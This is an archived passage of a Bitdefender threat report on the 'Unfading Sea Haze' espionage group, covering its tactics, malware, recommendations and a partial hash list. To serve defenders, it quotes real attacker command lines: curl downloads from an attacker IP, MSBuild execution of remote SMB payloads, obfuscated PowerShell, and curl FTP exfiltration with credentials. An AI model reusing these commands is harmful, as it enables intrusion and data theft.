{
	"id": "77a977f5-4ca3-4da2-a1cc-f43f1730fd4b",
	"created_at": "2026-04-06T00:13:46.058158Z",
	"updated_at": "2026-04-10T13:12:51.389888Z",
	"deleted_at": null,
	"sha1_hash": "4c50848a6102d1db0f0955630e8afcff7528c384",
	"title": "Deep Dive Into Unfading Sea Haze: A New Threat Actor in the South China Sea",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 575509,
	"plain_text": "Deep Dive Into Unfading Sea Haze: A New Threat Actor in the South\r\nChina Sea\r\nBy Martin Zugec\r\nArchived: 2026-04-05 21:31:16 UTC\r\nIn a recent investigation by Bitdefender Labs, a series of cyberattacks targeting high-level organizations in South China\r\nSea countries revealed a previously unknown threat actor. We've designated this group \"Unfading Sea Haze\" based on\r\ntheir persistence and focus on the region. The targets and nature of the attacks suggest alignment with Chinese interests.\r\nThis wasn't just about uncovering the present activities of Unfading Sea Haze. It was a journey through time, a digital\r\narchaeology of sorts. Our investigation, spanning at least eight victims – primarily military and government targets –\r\nstretched back to 2018. We documented Unfading Sea Haze’s current tactics, techniques, and procedures (TTPs), but\r\nalso the tools they developed in the past.\r\nAnalyzing multiple generations of their tools was like exploring a museum exposition of cyberespionage relics. We\r\nfound multiple iterations based on the well-known Gh0st RAT framework, alongside various .NET payloads.\r\nBut the investigation revealed a troubling trend beyond the historical context. Notably, the attackers repeatedly regained\r\naccess to compromised systems. This exploitation highlights a critical vulnerability: poor credential hygiene and\r\ninadequate patching practices on exposed devices and web services.\r\nThe extended period of Unfading Sea Haze’s invisibility, exceeding five years for a likely nation-state actor, is\r\nparticularly concerning. Despite extensive cross-referencing of artifacts and scouring public reports, we haven't found\r\nany traces of their previous activities. This research aims to raise awareness of the ongoing threat posed by Unfading Sea\r\nHaze and the importance of robust cybersecurity practices. 
By sharing our findings, we want to equip the security\r\ncommunity with the knowledge to detect and disrupt their espionage efforts.\r\nThis summary provides a high-level overview of the Unfading Sea Haze threat actor's tactics and the evolving nature of\r\ntheir malware arsenal. For a deeper dive, including a detailed analysis of the Gh0st RAT family and other malware\r\nsamples, please refer to the full research paper by Bitdefender Labs.\r\nAttribution\r\nPinpointing the exact culprit behind a cyberattack can be a complex task, and attributing the attacks we investigated to\r\nUnfading Sea Haze was no exception. Here's the TL;DR version of our research:\r\nNo Match with Previous Activity: Our investigation yielded no clear connection to any previously identified\r\nthreat actor. This lack of a known signature led us to designate this group as \"Unfading Sea Haze\".\r\nGeopolitical Targeting: The focus of Unfading Sea Haze's attacks – government and military organizations in\r\nSouth China Sea countries – suggests alignment with Chinese interests.\r\nTool Sharing Among Neighbors: The use of various Gh0st RAT variants, a tool popular with Chinese actors,\r\nhints at a potential network for sharing these tools within the Chinese cyber ecosystem.\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 1 of 18\n\nTechnique Similarity: One specific technique employed by Unfading Sea Haze – running JScript code through a\r\ntool called SharpJSHandler – resembled a feature found in the \"funnyswitch\" backdoor, which has been linked to\r\nAPT41. Both involve loading .NET assemblies and executing JScript code. However, this was an isolated\r\nsimilarity. No other overlaps with APT41's known tools were identified. 
This single similarity could be another\r\nindication of shared coding practices within the Chinese cyber threat scene.\r\nThe lack of a definitive match and the presence of these suggestive clues paint a picture of a sophisticated threat actor\r\nwith connections to the Chinese cyber ecosystem. However, more investigation and collaboration are needed to solidify\r\nthis attribution.\r\nAnatomy of an Attack\r\nUnderstanding how these attacks unfolded wasn't straightforward. We didn’t want to focus just on the latest incident.\r\nInstead, we wanted to examine the Unfading Sea Haze threat actor's past activities and any traces they may have left\r\nbehind. This broader investigation, while necessary, made things more complex.\r\nInitial Compromise\r\nUnfortunately, the initial method Unfading Sea Haze used to infiltrate victim systems remains unknown. This initial\r\nbreach happened over six years ago, making forensic evidence scarce and difficult to recover.\r\nHowever, we were able to identify at least one method of regaining access: spear-phishing emails with malicious\r\narchives. These archives contained LNK files disguised as regular documents. When clicked, these LNK files would\r\nexecute malicious commands. We observed multiple spear-phishing attempts over three months of 2023\r\n(March through May).\r\nHere are some of the email attachment names used:\r\nSUMMARIZE SPECIAL ORDERS FOR PROMOTIONS CY2023\r\nData\r\nDoc\r\nStartechup_fINAL\r\nIn each case, the LNK file was hidden inside a ZIP archive that shared the same name, for example Data.zip\\Data.lnk.\r\nA common tactic used by Unfading Sea Haze was to embed lengthy comments within the LNK file's command line.\r\nThese comments were likely intended to evade detection. 
We've included a full list of command lines in the full research\r\nwhite paper, but here is an example of this technique:\r\n\"C:\\\\Windows\\\\System32\\\\cmd.exe\" ;Learn English online and improve your skills through our high-quality courses and\r\nresources all designed for adult language learners. Everything you find here has been specially created by the British\r\nCouncil;/c tasklist|findstr /i \"ekrn.exe\"||curl -s -k 159.223.78[.]147/Recorded.log -o\r\nC:\\\\Users\\\\Public\\\\Libraries\\\\Recorded.log\u0026TIMEOUT /T 10\r\n/NOBREAK\u0026C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\MSBuild\r\nC:\\\\Users\\\\Public\\\\Libraries\\\\Recorded.log\u003enul\u0026\u0026echo Trump graduate\r\nWhile the comment section and filenames varied, the logic was always the same. Let's break it down step by\r\nstep:\r\nThere is an interesting part where the code checks if a process named ekrn.exe is running (step 3), a process commonly\r\nassociated with ESET Kernel Service. But this check is followed by a logical OR operator (||) and the execution\r\ncontinues only if this process is NOT detected. This suggests either a defense evasion technique, or that the threat\r\nactors named their own process ekrn.exe and skip deploying their malware if they find the machine was already\r\ncompromised.\r\nWe were able to download the malicious payload (MD5: 79da81e35600e3d9ec793537d04920c8) from one of the\r\nidentified URLs. Further analysis of the assembly confirmed it's a backdoor program we named SerialPktdoor.\r\nIn March 2024, new archive files for initial access were observed. These archives were mimicking the installation\r\nprocess of Microsoft Defender or exploiting current US political issues. 
List of archive names follows:\r\ninstall microsoft defender web protection\r\nstart windowsdefender\r\nWlndovvs Deffender User Guide Document\r\nbarack obama's tenure as the 44th president of the united states\r\nPresidency of Barack Obama\r\nAssange_Labeled_an_'Enemy'_of_the_US_in_Secret_Pentagon_Documents102\r\nThese LNK files execute a PowerShell command line similar to the one below (or the base64 encoded version of it):\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w Hidden -c \\\"net use\r\nhttp://loadviber.webredirect[.]org;Start-Process -WindowStyle Hidden -WorkingDirectory\r\n\\\\154.90.34[.]83\\exchange\\info C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe\r\nThis is a clever example of a fileless attack that exploits a legitimate tool: MSBuild.exe. MSBuild, short for Microsoft\r\nBuild Engine, is a powerful tool for automating the software build process on Windows. MSBuild reads a project file,\r\nwhich specifies the location of all source code components, the order of assembly, and any necessary build tools.\r\nMSBuild supports various programming languages like C#, C++, and even web development projects. It's a core\r\ncomponent behind popular development environments like Visual Studio.\r\nWhen launching MSBuild, you typically specify a project file as a command-line argument. This project file provides\r\ninstructions on how to build the software. If the project file isn't specified on the command line, MSBuild tries to search\r\nfor a project file within the current working directory by default. If a project file is located, MSBuild will attempt to\r\nexecute the instructions within that file. 
Here's the key point: this execution happens entirely in memory without ever\r\nwriting the contents of the project file to disk.\r\nIn this attack, the criminals start a new MSBuild process with a twist: they specify a working directory located on a\r\nremote SMB server (like \\154.90.34.83\\exchange\\info in the above example). By setting the working directory to a\r\nremote location, MSBuild will search for a project file on that remote server. If a project file is found, MSBuild will\r\nexecute the code it contains entirely in memory, leaving no traces on the victim's machine.\r\nAnother example showcases a more intricate and obfuscated version of the same technique.\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ;\\\"Joseph Robinette Biden Jr. (/'ba?d?n/ (listen) BY-d?n; born 20 November 1942) is an American politician who is the 46th and current president of the United States. A\r\nmember of the Democratic Party, he previously served as the 47th vice president from 2009 to 2017 under President\r\nBarack Obama, and represented Delaware in the United States Senate from 1973 to 2009.\\\";$O=$env:tmp;$X=\\\"\r\n(U)_Summary_Complaint_Report.lnk\\\";$Q=\"gci $O -r -ea 0|?{$_.Name -like $X -and $_.Length -eq 205518}|sort\r\nLastWriteTime -desc\";if($Q.Count -gt 0){$X=$Q[0].FullName;};$Y=\r\n[System.IO.File];$K=$Y::ReadALlBytes($X);$Z=$O+\\\"\\\r\n(U)_Summary_Complaint_Report.jpg\\\";$Y::WriteAllBytes($Z,$K[3616..202733]);if(test-path $Z)\r\n{\u0026$Z;};$Z=$O+\\\"\\New_Text_Document_jpg_012.log\\\";$Y::WriteAllBytes($Z,$K[202734..205517]);c:\\w*\\*t\\*4\\v4*\\*d.*e\r\n\"$Z\";\r\nHere's a breakdown of this script block:\r\nThe script starts with a seemingly irrelevant comment about Joseph R. Biden Jr. 
This is likely an attempt to\r\ndistract from the actual malicious code.\r\nThe PowerShell code extracts a hidden file from another seemingly harmless file. It accomplishes this by\r\nsearching for a specific file named (U)_Summary_Complaint_Report.lnk, extracting a portion of the bytes from\r\nthat file and saving it as a new file named log\r\nThe last line uses complex patterns with wildcards (c:\\w*\\*t\\*4\\v4*\\*d.*e) to represent the path to exe. It then\r\npasses the newly created file (New_Text_Document_jpg_012.log) as a parameter ($Z) to MSBuild.\r\nOn one of the compromised machines, we also found evidence that malicious tools were using Apache httpd.exe,\r\nsuggesting that the attackers might have exploited vulnerabilities in web server software to gain access to systems.\r\nPersistence\r\nThe attackers seem to favor scheduled tasks as a way to establish persistence. Here's what's interesting: scheduled task\r\nnames mimic legitimate Windows files but are combined with DLL sideloading to execute a malicious payload. For\r\nexample, a task named \\microsoft\\windows\\clipsetup\\clipsvc runs the harmless clipsvc.exe program (renamed\r\nmspaint.exe), which in turn loads a malicious library (DLL file).\r\nThis tactic demonstrates how attackers exploited legitimate software. They identified common programs on victim\r\nmachines, like the genuine mspaint.exe located in c:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-mspaint_31bf3856ad364e35_10.0.17763.1697_none_db927d8fc072840a. They then copied this executable and renamed\r\nit to ServerManager.exe. The key here is the new location. Attackers placed this renamed copy in a directory\r\nc:\\\\ProgramData\\\\Microsoft\\\\ServerManager\\\\Events\\\\. 
Alongside this executable, they placed a malicious DLL file\r\n(msftedit.dll) in the same directory.\r\nWhen the program runs from its unfamiliar location, it searches for DLLs in its current directory. By placing the\r\nmalicious DLL next to the program, the legitimate software gets tricked into loading the attacker's malicious code\r\ninstead of the intended Microsoft DLL.\r\nIn another example of creative application of DLL sideloading, attackers targeted the service with the display name\r\n\"Windows Perception Simulation Service\" (service name perceptionsimulation). This service typically launches a\r\nlegitimate library named %SYSTEM%\\hid.dll located in the system directory. However, the attackers exploited this\r\nprocess by adding their own malicious library hid.dll to the folder %SYSTEM%\\perceptionsimulation. This malicious DLL\r\nwould be loaded by the genuine service executable before the legitimate DLL library.\r\nWe discovered a tool named servicemove64.exe that appears to enable the remote deployment of the attack. This tool\r\ntakes a hostname as a parameter, writes the malicious hid.dll file on the targeted remote system, and remotely starts the\r\n\"perceptionsimulation\" service, triggering the sideloading of the attacker's DLL.\r\nIt's important to note that the default startup type for this service is \"Manual,\" meaning it wouldn't launch automatically\r\non system startup. 
However, the existence of the servicemove64.exe tool suggests the attackers might have a method to\r\ninitiate the service after gaining initial access.\r\nWe've written a tech explainer on DLL sideloading, in case you'd like to learn more about how it\r\nworks.\r\nHere is a list of other scheduled task names that we’ve collected:\r\nupdate\r\nbrotherprtdrv\r\nmicrosoftupdate\r\nsynchronizetime222\r\nmicrosoft\\\\windows\\\\wmiprvse\r\nmicrosoft\\windows\\devicesflow\r\nmicrosoft\\\\windows\\\\prod\r\nmicrosoft\\\\windows\\\\coint\r\nmicrosoft\\\\adobeupdate\r\n\\\\microsoft\\\\windows\\\\setwlansvc\\\\mscorsvw\r\n\\\\microsoft\\\\windows\\\\appxdeploymentclient\\\\proactivescan\r\n\\\\microsoft\\\\windows\\\\textservicesframework\\\\synchronizetime222\r\n\\\\microsoft\\\\windows\\\\clipsetup\\\\clipsvc\r\n\\\\microsoft\\\\windows\\\\connection\\\\netsync\r\n\\\\microsoft\\\\windows\\\\services\\\\servermanager\r\nBeyond using scheduled tasks, the attacker employed another persistence technique: manipulating local Administrator\r\naccounts. This involved attempts to enable the disabled local Administrator account, followed by resetting its password.\r\nIn most cases, the attacker hides the newly enabled Administrator account from the login screen by setting a specific\r\nregistry key (HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList).\r\nInterestingly, only two unique passwords were observed for the compromised Administrator accounts:\r\n\"D0ueqw0A_63dJJ\" and \"UxxUtZBcM_x8gSb6IHWvp\".\r\nIn a surprising move for a nation-state threat actor, Unfading Sea Haze has been incorporating Remote Monitoring and\r\nManagement (RMM) tools into their arsenal. Since at least September 2022, they've been utilizing ITarian RMM to gain\r\na foothold on victim networks. 
This use of a commercially available RMM tool marks a significant deviation from the\r\ntypical tactics employed by nation-state actors.\r\nWe also found evidence suggesting the attacker may have established persistence on web servers, including both\r\nWindows IIS and Apache httpd. Potential methods include web shells or malicious modules designed for these web\r\nserver platforms (IIS modules and httpd modules). However, despite collecting various forensic artifacts, we couldn't\r\ndefinitively determine the exact persistence mechanism due to a lack of crucial information.\r\nExecution\r\nThe Unfading Sea Haze threat actor has created a sophisticated arsenal of custom malware and tools. This section\r\nprovides a high-level overview of the most frequently used components observed during the investigation. For a deeper\r\ndive into the technical specifics of this malware, we recommend referring to the full research whitepaper.\r\nFor several years, dating back to at least 2018, the attackers primarily relied on three types of malicious agents:\r\nSilentGh0st, TranslucentGh0st, and three variants of the .NET agent SharpJSHandler supported by Ps2dllLoader.\r\nStarting in 2023, in an effort to evade detection, the attackers began deploying new malicious components. Ps2dllLoader\r\nhas been replaced with a new mechanism that utilizes msbuild.exe and C# payloads stored on a remote SMB share. Fully\r\nfeatured Gh0stRat variations have been replaced with more modular (plugin-based) variants called FluffyGh0st,\r\nInsidiousGh0st (C++, C#, and Go versions) and EtherealGh0st.\r\nPs2dllLoader\r\nThis collection of malware was combined with a loader we named Ps2dllLoader, which was responsible for loading the\r\n.NET or PowerShell malicious code directly in memory (fileless attack). 
This functionality allows attackers to bypass\r\ntraditional security measures that might scan files for suspicious code. In 2024, we discovered an updated version\r\nthat includes AMSI and ETW patching to avoid detection.\r\nAntimalware Scan Interface (AMSI) is a Windows feature that allows security software to scan code for\r\nmalware before it is executed, which is especially useful for catching malicious PowerShell code. GravityZone\r\nsupports AMSI's capabilities, but we also use a proprietary command-line parser to enhance our detection\r\ncoverage.\r\nEvent Tracing for Windows (ETW) is another essential Windows feature. It functions like a system diary,\r\nallowing the operating system and other programs to log important events that occur. This information is valuable\r\nfor security solutions like EDR and XDR. Attackers sometimes attempt to disable ETW as part of their strategy to\r\nbypass detection. To counter this tactic, GravityZone relies on a combination of user-mode and kernel-mode\r\ntechnologies to detect such tampering attempts.\r\nIt's worth noting a possible evolution in the attacker's methods. Ps2dllLoader appears to be taking a backseat to a\r\ndifferent fileless attack technique. As detailed in the \"Initial Compromise\" section, they are increasingly turning to in-memory execution of .NET payloads leveraging MSBuild.exe and remote SMB shares.\r\nSharpJSHandler\r\nOne of the payloads delivered by Ps2dllLoader is SharpJSHandler. It functions like a web shell alternative. This is\r\neven hinted at by the final payload's internal name - noiis.dll. Here, \"No IIS\" suggests the agent acts as an alternative to\r\ntraditional ASP.NET web shells, but without requiring an IIS server to be operational.\r\nSharpJSHandler operates by listening for HTTP requests. 
Upon receiving a request, it executes the encoded JavaScript\r\ncode using the Microsoft.JScript library.\r\nOur investigation also uncovered two additional variations that utilize cloud storage services for communication instead\r\nof direct HTTP requests. We have found variations for DropBox and for OneDrive. In this case, SharpJSHandler\r\nretrieves the payload periodically from a DropBox/OneDrive account, executes it, and uploads the resulting output back\r\nto the same location.\r\nThese cloud-based communication methods present a potential challenge for detection as they avoid traditional web\r\nshell communication channels.\r\nGh0st Army\r\nOur investigation uncovered three primary strains within the Gh0st RAT family, each showcasing a distinct development\r\npath.\r\nThe evolution and different variations of the Gh0st RAT used by Unfading Sea Haze.\r\nMonolithic Versions (SilentGh0st and InsidiousGh0st):\r\nThe initial versions came packed with features, including numerous commands and modules. This very\r\ncomplexity and heavy footprint made them easier targets for security solutions.\r\nSilentGh0st, the oldest variant, later evolved into InsidiousGh0st. This evolution involved streamlining\r\nfunctionality, particularly where redundancy existed across modules.\r\nInterestingly, the language used for development shifted over time. InsidiousGh0st was initially written in\r\nC++, then upgraded to C# for features like SOCKS5 and TCP proxy support, and PowerShell\r\nimprovements. 
Finally, a Go version emerged, introducing QUIC protocol support (prior versions relied\r\nsolely on TLS over TCP and unencrypted TCP).\r\nModular Versions (TranslucentGh0st, EtherealGh0st, and FluffyGh0st):\r\nThese more recent strains embrace a much more modular approach, emphasizing dynamic plugins and a\r\nlighter overall footprint.\r\nAs we analyzed artifacts from various time periods, another trend emerged: a preference for dynamic behavior by the\r\nattackers. Usernames and passwords transitioned from static values to a more dynamic approach, utilizing random\r\ngeneration. The malware also diversified its C2 infrastructure, employing multiple servers instead of relying on a limited\r\nfew.\r\nAn approximate timeline of Gh0st variations deployment.\r\nThere have been additional tools like SerialPktdoor, Stubbedoor, and SharpZulip. These are described only in the full\r\nresearch whitepaper.\r\nData Collection\r\nOur analysis of collected artifacts strongly suggests the primary objective of these attacks is espionage. The attackers\r\nemployed a combination of custom and off-the-shelf tools to gather sensitive data from victim machines.\r\nxkeylog Keylogger: This custom-made keylogger, named for its frequent export filename, captures keystrokes on\r\ncompromised systems. We encountered it in various forms, including DLL files and shellcode payloads. The attackers\r\nstrategically placed xkeylog DLLs in common locations like c:\\windows\\setup\\cert.dll and c:\\windows\\cursors\\curs.cur.\r\nThese DLLs were likely loaded using the legitimate tool \"regsvr32.exe\". Shellcodes containing xkeylog were executed\r\nthrough various means, including the perceptionsimulation service described in the previous section.\r\nBrowser Data Stealer: This custom tool collects browsing data from compromised machines. 
The loader used to\r\nexecute the browser stealer is also interesting, as we've observed this same loader used to deploy at least one other tool –\r\na network scanner that remains active in the attacker's current operations. Once loaded in memory and executed, the\r\nbrowser stealer can be customized using command-line arguments. These arguments control the specific actions it takes:\r\nthe stealer parses internal browser database files to extract valuable information, such as cookies. Our analysis revealed\r\nit supports a range of browsers:\r\nGoogle Chrome\r\nFirefox\r\nMicrosoft Edge\r\nInternet Explorer\r\nIn March 2024, we observed a new tool added to the attacker's arsenal: a PowerShell script embedded within\r\nPs2dllLoader samples. This script targets Chrome browser data, parsing internal files to extract sensitive information. It\r\nappears the attackers haven't limited themselves to Chrome, as a similar script targeting the Edge browser has also been\r\nidentified.\r\nScript for extracting encrypted data from Google Chrome\r\nUSB and Windows Portable Devices (WPD) Monitor: This custom tool monitors the presence of portable devices. The\r\nmonitoring tool was found at C:\\Users\\\u003cUser\u003e\\AppData\\Roaming\\mscorsvc.dll and is loaded via DLL sideloading. Once\r\nloaded, the tool checks for portable devices every 10 seconds. If a WPD or USB is mounted, it gathers details about the\r\ndevice, and sends them using an HTTP GET request to an attacker-controlled server at http://139.180.216[.]33/ico/error/?\r\n\u003ccomputer name\u003e%20\u003cdevice manufacturer\u003e%20\u003cdevice model\u003e%20\u003cdevice friendly name\u003e.\r\nWhile these custom tools provided significant data collection capabilities, the attackers also employed manual\r\ntechniques. 
We observed instances where they used the common compression tool rar.exe to archive data, specifying\r\nfiles of interest through command-line parameters. They specified file extensions (e.g., .docx, .pdf) and targeted only\r\nfiles modified after a specific date, ensuring they captured the latest data. Similar extraction commands were used to\r\ncollect files from remote systems using net use. The resulting archive was password-protected, ready for extraction.\r\nThe attackers also specifically targeted data from messaging applications like Telegram and Viber. To ensure they could\r\naccess these apps' files, they first terminated the running processes (telegram.exe and viber.exe) before using rar.exe to\r\narchive the application data.\r\nThis blend of custom and off-the-shelf tools, along with manual data extraction, paints a picture of a targeted espionage\r\ncampaign focused on acquiring sensitive information from compromised systems.\r\nData Exfiltration\r\nAfter an extensive analysis of the artefacts collected during the investigation, we concluded that the exfiltration process\r\nbetween March 1st, 2018 and January 20th, 2022, was performed using a custom tool we’ve named DustyExfilTool.\r\nThis command line tool simplifies data exfiltration: it takes a file path, server IP address, and port as input, and transmits\r\nthe file to the specified server using TLS over TCP for secure communication.\r\nStarting in January 2022, the attackers switched their exfiltration strategy. They abandoned DustyExfilTool in favor of\r\nthe curl utility and FTP protocol. 
The initial curl command for exfiltration utilized hardcoded credentials\r\nadmin:EH3FqtECXv152 as seen in the following example:\r\ncurl -C - ftp://139.180.221[.]55:80/ -u admin:EH3FqtECXv152 -T c:\\\\windows\\\\addins\\\\fs.tmp\\\r\nHowever, since 2023, a more dynamic approach has been observed. The username and password for the FTP server are\r\nnow changed more frequently, and both credentials appear to be randomly generated. This shift suggests the attackers are\r\nattempting to improve their operational security by employing less predictable credentials.\r\nConclusion and recommendations\r\nThe Unfading Sea Haze threat actor group has demonstrated a sophisticated approach to cyberattacks. Their custom\r\nmalware arsenal, including the Gh0st RAT family and Ps2dllLoader, showcases a focus on flexibility and evasion\r\ntechniques. The observed shift towards modularity, dynamic elements, and in-memory execution highlights their efforts\r\nto bypass traditional security measures. Attackers are constantly adapting their tactics, necessitating a layered security\r\napproach.\r\nHere are some recommendations to mitigate the risks posed by the Unfading Sea Haze threat actor and similar groups:\r\nVulnerability Management: Start with prevention - companies must prioritize patch management to swiftly\r\nidentify and address critical vulnerabilities. Implementing robust processes for patch deployment can\r\nsignificantly reduce the attack surface and mitigate the risk of exploitation. Prioritize addressing vulnerabilities\r\nwith high CVSS scores, particularly for servers exposed to the internet that can lead to remote code execution.\r\nStrong Authentication: Start with enforcing strong password policies that require complex characters and\r\nregular changes. Avoid password reuse across accounts. For an extra layer of protection, enable Multi-Factor\r\nAuthentication (MFA) whenever possible. 
MFA significantly reduces the risk of unauthorized access even if your\r\npassword is compromised. To future-proof your security posture, consider exploring passwordless authentication\r\noptions compliant with the FIDO2 standard.\r\nProper Network Segmentation: Implementing proper network segmentation and adopting a zero trust\r\nnetworking model are crucial steps in enhancing security posture. By segmenting the network into smaller, more\r\nmanageable zones and enforcing strict access controls based on the principle of least privilege, organizations can\r\nlimit the lateral movement of threat actors and minimize the potential impact of a breach.\r\nMultilayered Defense: Adopting a multilayered security approach is essential. Organizations should invest in a\r\ndiverse range of security controls, including network segmentation and endpoint protection to create overlapping\r\nlayers of defense against cyber threats.\r\nNetwork Traffic Monitoring: Maintain network traffic monitoring to identify unusual communication patterns\r\nthat might indicate remote code execution or cloud storage interactions employed by malware. Additionally, web\r\nfiltering solutions can help block access to malicious websites that might be used for malware distribution.\r\nEffective Logging: Ensure logging is enabled, functional, and provides sufficient information and historical data\r\nfor effective support when needed. Robust logging mechanisms can aid in post-incident analysis, forensic\r\ninvestigations, and monitoring for suspicious activities. Regularly review and update logging configurations to\r\ncapture relevant security events and maintain visibility across the environment.\r\nDetection and Response: Despite your best efforts, it is still possible that modern threat actors will make it past\r\nyour prevention and protection controls. 
This is where your detection and response capabilities come into play.\r\nWhether you get these capabilities as-a-product (EDR/XDR) or as-a-service (MDR), the purpose is to minimize\r\nthe time when threat actors remain undetected. Bitdefender MDR team conducts a proactive search through an\r\nenvironment to hunt malicious, suspicious, or risky activities that have evaded detection by existing tools.\r\nCollaboration and Information Sharing: Foster collaboration within the cybersecurity community to share\r\nthreat intelligence and best practices. By participating in information-sharing initiatives and collaborating with\r\nindustry peers, organizations can gain valuable insights into emerging threats and enhance their cyber resilience.\r\nAdvanced Threat Intelligence: The right threat intelligence solutions can provide critical insights about attacks.\r\nBitdefender IntelliZone is an easy-to-use solution that consolidates all the knowledge we've gathered regarding\r\ncyber threats and the associated threat actors into a single pane of glass for the security analysts, including access\r\nto Bitdefender’s next-generation malware analysis service. If you already have an IntelliZone account you can\r\nfind additional structured information under Threat ID BDx8y3ujm3X.\r\nThis summary provides a high-level overview of the Unfading Sea Haze threat actor's tactics and the evolving nature of\r\ntheir malware arsenal. 
For a deeper dive, including a detailed analysis of the Gh0st RAT family and other malware\r\nsamples, please refer to the full research paper by Bitdefender Labs.\r\nIndicators of Compromise\r\nHashes\r\nMD5 Malware Family\r\ncb95ad8fad82eac1c553cd2d7470100b Ps2dllLoader\r\n19dbf2d82f6f95a73f1529636e775295 SilentGh0st\r\n1ce17f0e2a000a889b3f81e80b95f19f DustyExfilTool\r\ne7433f8a0943a6025d43473990ec8068 TranslucentGh0st\r\n6a0933d08d8d27165f72c53df8f1bf04 DustyExfilTool\r\n1dbcd8d2f5718fa7654f8b5f34b88d43 Loader that uses xyz123xyz for AES decryption\r\nac7b8524098cbb423619706ff617b6a6 Network Scanner\r\n95701a74b6b3de68fc375cd08ae8d2c2 SilentGh0st\r\n2e4055e16c1a9274caa182223977eda1 SilentGh0st\r\n7e10d7dd09f5ee2010990701db042f11 WPD USB monitor tool\r\na5af41fda8ef570fda96c64a932d4247 FluffyGh0st\r\n1e55bda0b7eb0aea78577a21f51e8f5c Ps2dllLoader\r\n5421e3cef32e534fa74a26df1c753700 SharpJSHandler, OneDrive variant\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 11 of 18\n\nb3dc2dcb0f2a5661aed1f4e6d9e88bc6 Ps2dllLoader\r\n4d99127e4b1d27a56f7c4b198739176b .Net loader used by Ps2dllLoader\r\n5bd1eb1166da401c470af2b9e204b2d1 .Net loader used by Ps2dllLoader\r\n2c45c1c35c703bb923b558343f00ea34 Ps2dllLoader\r\n70773eb54234c486c46048ade57db45b Stubbedoor\r\n69310040e872806cb2b00d3addb321a7 Ps2dllLoader\r\n35623ba9f8fcbcf0fce96aa2465b0b66 SharpJSHandler\r\n828faccaaf8e70be1c32ae5588d3df12 Ps2dllLoader\r\n4ec62fdd3d02bc9b81a8c78910b8463a Ps2dllLoader\r\ncff31de1b28f6b00d13d15c2be08a982 SharpJSHandler DropBox variant\r\n7ff8a134c1ee44c915339a74e4a2d3ca Ps2dllLoader\r\ne3fb4c2d591a440cfe6419f5a9825e8 Ps2dllLoader\r\n0dd4603f7c3a80a2408e458fe58b2e60 InsidiousGh0st .NET variant\r\n11c7f264184ed52df4a3836a623845c8 TranslucentGh0st\r\n55a246ace9630b31c43964ebd551e5e2 FluffyGh0st\r\n8c31532f73671995d7f3b6d5814ba726 Ps2dllLoader\r\n5268206fb6c96f614f67cd5d686f42af 
TranslucentGh0st\r\ncf2f7331a04bb9cd47b58a5c80d4c242 EtherealGh0st\r\n3d87f0bd243cff931bb463fce1d115e3 EtherealGh0st\r\n98de3eeda1adefec31d3e3f00079dd2d EtherealGh0st\r\nb04d9dba3bc922a33c1408d4fbf80678 Ps2dllLoader\r\n35a307b73849a3d7a7cd603a0c4698f2 SerialPktdoor loader\r\n3d879bc2fb28c5abbcd6e08b6e5dc762 InsidiousGh0st\r\n7aba74bfbf5cb068fb52e8813c40f4cd Xkeylog keylogger\r\n510c36c9061778d166e23177a191df35 EtherealGh0st\r\nb6cd3d88a6d6886718b6113147a99901 Malicious C# script\r\n1179f589791c2eaa1ae33f38e62753d0 Malicious C# script\r\n0b744f9d38e125cd4fe14289272ac0e2 InsidiousGh0st\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 12 of 18\n\n960a964cab127c4f3c726612fdeaeb08 EtherealGh0st\r\n1d2185c956a75a8628e310a38dea4001 InsidiousGh0st\r\n7169179cc18e6aa6c2c36e4bee59f63d EtherealGh0st\r\ncf398f9780de020919daad9ca4a27455 EtherealGh0st\r\n96a43d13fd11464e9898af98cc5bb24b Xkeylog keylogger\r\n14a88779c7e03ecfc19dd18221e25105 EtherealGh0st\r\n2bf96bd44942ca8beed04623a1e19e24 Hid.dll loader\r\nfabdf1094b49673bc0f015cbb986bad5 Hid.dll loader\r\n00bcbeb6ffdadc50a931212eff424e19 EtherealGh0st\r\ne5fc13c39dd81e6de11d1c211f4413ba Xkeylog keylogger\r\n9425f9f7cc393c492deb267c12d031c5 Hid Dropper\r\n551bda0f19bf2705f5f7bd52dcbc021f EtherealGh0st\r\n654163ab9002bd06f68a9f41123b1cd4 EtherealGh0st\r\nfda22f52f0d3a81f095a00810a3dd70a EtherealGh0st\r\ncf5f2e3e1ce82e75a2d0885af5efa1ef EtherealGh0st\r\n3631001b60bdf712e6294d40ec777d87 EtherealGh0st\r\n4e470ea6d7d7da6dd4147c8e948df7c8 InsidiousGh0st\r\n73daf06fed93d542af04d59a4545fab0 FluffyGh0st\r\n100c461d79471c96eba20c8eae35c5ba FluffyGh0st\r\n40466fd795360ac4270751d8c4500c39 EtherealGh0st\r\ncb9e6fa194b8fa2ef5b6b19e0bd6873e EtherealGh0st\r\naf215f4670ae190e699c27e5205aadee Eventlog info extractor\r\n39d43f21b3c2b9f94165f5257b229fb4 EtherealGh0st\r\n3dc8d8a70cc60a2376ce5c555d242cf3 EtherealGh0st\r\n6f01bed0b875069ec5b9650e6d8c416f 
